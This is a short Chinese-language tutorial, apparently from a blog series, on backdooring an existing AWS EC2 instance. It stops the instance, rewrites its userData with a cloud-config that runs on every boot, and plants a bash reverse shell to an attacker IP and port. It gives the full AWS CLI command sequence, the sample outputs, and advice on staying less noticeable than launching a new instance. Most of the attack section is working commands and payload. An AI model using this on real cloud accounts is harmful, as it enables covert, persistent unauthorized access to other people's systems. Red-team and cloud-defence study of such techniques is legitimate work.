建立新的EC2 instance做reverse shell並不一直是一個好的主意,首先,新啟動一個EC2很容易被發現。
必須要有的權限:
ec2:DescribeInstances
ec2:ModifyInstanceAttribute
首先,先暫停ec2,沒有暫停不能修改
> aws ec2 stop-instances --instance-ids {EC2_INSTANCE_IP}
沒暫停的Output
An error occurred (IncorrectInstanceState) when calling the ModifyInstanceAttribute operation: The instance 'i-XXXXXXXXXXXX' is not in the 'stopped' state.
成功暫停的Output
{
"StoppingInstances": [
{
"CurrentState": {
"Code": 64,
"Name": "stopping"
},
"InstanceId": "i-XXXXXXXXXXXX",
"PreviousState": {
"Code": 16,
"Name": "running"
}
}
]
}
Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0
--//
Content-Type: text/cloud-config; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="cloud-config.txt"
#cloud-config
cloud_final_modules:
- [scripts-user, always]
--//
Content-Type: text/x-shellscript; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="userdata.txt"
#!/bin/bash
echo "Hello World" >> /home/ubuntu/hello.txt # 這行是測試用的
/bin/bash -i >& /dev/tcp/IP/PORT 0>&1 # Reverse shell範例
--//
> base64 -i blackdoor.sh > blackdoor_encoded.sh # 這是Mac寫法,其他作業系統不要抄錯了
> aws ec2 modify-instance-attribute \
--instance-id i-XXXXXXXXXXXX \
--attribute userData \
--value file://blackdoor_encoded.sh
> aws ec2 start-instances --instance-ids i-09d20a0b2b49d77cc
Output
{
"StartingInstances": [
{
"CurrentState": {
"Code": 0,
"Name": "pending"
},
"InstanceId": "i-XXXXXXXXXX",
"PreviousState": {
"Code": 80,
"Name": "stopped"
}
}
]
}
等狀態是執行中或是running的時候就可以進去EC2查看
/var/log/cloud-init-output.log有沒有出現錯誤
iThome鐵人賽
看影片追技術